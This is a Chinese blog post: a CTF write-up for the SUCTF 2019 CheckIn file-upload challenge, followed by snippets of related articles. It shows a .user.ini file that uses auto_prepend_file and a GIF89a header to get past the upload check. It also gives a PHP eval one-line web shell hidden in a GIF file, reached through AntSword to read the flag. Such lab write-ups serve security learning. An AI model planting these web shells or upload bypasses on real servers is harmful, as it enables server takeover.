一天一道ctf 第15天(.user.ini文件上传)

最新推荐文章于 2023-02-02 10:59:31 发布
最新推荐文章于 2023-02-02 10:59:31 发布
阅读量296 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/115218597
版权
该博客讲述了如何利用.user.ini文件的动态加载特性结合auto_prepend_file函数,构造一句话木马绕过文件头检测进行文件上传攻击。通过上传包含PHP代码的.gif文件,然后访问特定页面触发木马,最终通过蚁剑连接获取服务器信息。
摘要由CSDN通过智能技术生成

[SUCTF 2019]CheckIn
看页面是一个文件上传漏洞
构造.user.ini文件和test.gif文件

//.user.ini
GIF89a
auto_prepend_file=test.gif

//test.gif
GIF89a
<script language="php">eval($_POST['a']);</script>

.user.ini是一个可以让用户自己写的ini文件,而且可以被动态加载,意味着我写好以后不用重启服务器也能运行。其中的auto_prepend_file函数可以让php文件自动包含某个文件,这里我们用auto_prepend_file=test.gif来包含写有一句话木马的test.gif。
因为上传过滤中加入了文件头检测,所以我们在前面加上GIF89a绕过

两次上传以后我们访问http://3cc9008b-881a-4bed-ae04-90fb8a1a768d.node3.buuoj.cn/uploads/d99081fe929b750e0557f85e6499103f/index.php页面显示GIF89a说明已经上传成功。我们再用蚁剑连接这个网址,虚拟终端输入cat /flag
在这里插入图片描述

scrawman
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
[ctf web]上传user.ini绕过 文件上传漏洞 ctfshhow-web153 wp
ShenZ的博客
07-27 1028
这个太糟糕了,我typora截图好多,不知道有没有放乱掉 如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和 PHP_INI_USER 模式可以 找到这两个auto_append_file和auto_prepend_file,作用: 一个相当于在每个php文件尾加上 include(“xxxx”) 一个相当于文件头加上 include(“xxx”) 其中xxx就是 auto_append_file的值。 因为.user.ini只对他同一目录下的文件起作用,也就是
.user.ini上传详解附CTF例题
hxhxhxhxx的博客
07-06 2675
.user.ini上传详解附CTF例题题目解法 https://buuoj.cn/challenges#[SUCTF%202019]CheckIn [SUCTF 2019]CheckIn 题目 解法 GIF89a //绕过exif_imagetype() auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。它包含在所有php文件前先执行 auto_append_file=a.j
文件上传-.user.ini的妙用
T1ngSh0w的博客
09-22 7768
文件上传漏洞-.user.ini文件上传中的妙用
ctfshow web13 文件上传.user.ini
m0_46412682的博客
07-16 2024
ctfshow web13 文件上传 开始的页面 先上传一张正常的照片,显示error file size,这张图片是886k,再上传一张小的照片还是error file size 不管先,上传一句话木马1.php,提示错误,应该是过滤了后缀名 现在上传1.txt,内容为<?php eval($_GET[‘w’]);?>,还是文件大小问题 内容改小一点<?php eval($_GET[w]); 这里我们实现能不能上传.htaccess文件,这里是上传不了 之前再buuctf中有道也是文件
文件上传之利用user.ini实现任意文件上传
wcwdnmdnmd的博客
02-02 592
攻防世界的easyupload,利用user.ini实现文件上传
[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
热门推荐
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
CTF Web学习(二)----代码审计、burp suite应用
网络猿的博客
01-10 1107
CTF Web学习(二) 代码审计、burp suite应用 CTF Web学习目录链接 CTF Web学习(一):基础篇及头文件修改、隐藏 CTF Web学习(二):代码审计、burp suite应用 文章目录CTF Web学习(二)前言一、BugKu Web题(一)BugKu Web5 矛盾(二)BugKu Web8 文件包含(三)BugKu Web9 flag In the variable !(四)BugKu Web11 网站被黑了 黑客会不会留下后门(五)BugKu Web12 本地管理员(六
Dest0g3 520迎新赛 writeup (misc部分 + web部分)
ShenZ的博客
05-30 3432
Dest0g3 520迎新赛 Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius EasyWord EasyEncode Python_jail rookie hacker-1 rookie hacker-2 4096 EasySSTI phpdest EasyPHP SimpleRCE funny_upload middle PharPOP 1.phar的上传与触发 2.POP链 NodeSoEasy ezip Really Easy Sql
.user.ini配置文件
m0_52051132的博客
12-10 1152
user.ini。它比.htaccess 用的更广,不管服务器是 nginx/apache/IIS,当使用 CGI/.user.ini 文件作用:所有的 php 文件都自动包含 test.jpg 文件。.user.ini 相当于一个用。类似于 apache 的.htaccess,但语法与.htacces 不同,语法跟 php.ini 一致。FastCGI 来解析 php 时,php 会优先搜索目录下所有的.ini 文件,并应用其中的配置。再上传一个内容为 php 一句话脚本,命名为 test.jpg。
.user.ini——[SUCTF 2019]CheckIn
cainiao17441898的博客
05-10 101
前言:这道题有关对.user.ini的了解和应用。 是一个文件上传的考题。点开源码。发现里面有个witeup提醒。里面提示了.user.ini文件。.user,ini可能存在后门 常见的文件头“” 1、.JPEG:.JPE; .JPG “JPGGraphic File” 2、.gif :“GIF 89A” 3、.zip: “ZIP Compressed” 4、.doc: .xls; .xlt; .ppt; .apr “MS Compound Document v1 or Lotus Approach APR
.user.ini文件构成的PHP后门
11-14 661
http://drops.wooyun.org/tips/3424 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastc...
BUUCTF web CheckIn (upload新姿势.user.ini)
H4ppyD0g的博客
02-24 698
一看是文件上传题目,很自信,之前做过upload专题,基本上就那么几种考点。 上传一个1.php试水,果然不行。 那就看看将小马写在1.jpg文本文件中,用burp改包行不行,结果被检查出来了。 嗯…应该是会检测文件属性吧,直接把小马写进txt然后该后缀名是不行了。 知识盲区 exif_imagetype:not image! ,是用了 exif_imagetype() 函数对文件格式进行了...
CTF---Web---文件包含---06---win.ini
qq_22160557的博客
07-28 1409
文章目录前言一、题目描述二、解题步骤1、 构造payload2、 访问链接三、总结 前言 题目分类: CTF—Web—文件包含—06—win.ini 一、题目描述 题目:文件包含 http://172.16.15.206/stage/5 提示:成功包含win.ini即可获取到key值 二、解题步骤 1、 构造payload 首先,考生需要明白win.ini是每台windows系统上都有的文件,而且这个文件是存放在C盘根目录下的windows目录下的,C://Windows//win.ini/,明白这一点
神秘的.user.ini文件
guanling881023的博客
03-21 2703
神秘的.user.ini文件.user.ini究竟是个神秘东东?我们看看官方怎么说:http://php.net/manual/zh/conf...自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用 .htacce...
ini文件注释_CTF中.htaccess文件的利用
weixin_39630762的博客
11-27 233
CTF中.htaccess文件的利用.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过.htaccess文件可以在所在文件夹和子文件下改变php.ini的配置。在CTF的题目中,如果能够上传或者写入一个.htaccess,我们就可以做到比如说绕过WAF,以及文件包含等操作,因为之前打羊城杯看到.htaccess的文件的利用,就想把我自己之前遇到过...
2021-08-08ctf中的上传upload题目.user.ini绕过后缀黑名单过滤(同文件夹下有php文件突破口)
qq_45290991的博客
08-08 1179
从SUCTF 2019 CheckIn 浅谈.user.ini的利用 / 2019-08-28 08:59:00 / 转自loong大佬-来自先知社区 ...
ctf技能树文件上传.htaccess
最新发布
04-30
文件上传漏洞通常是指在网站中存在对用户上传文件的功能,但是没有对上传文件的类型、大小、数量、路径等进行严格限制或过滤,从而导致攻击者可以通过上传包含恶意代码的文件来实现攻击的目的。而.htaccess是一个常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值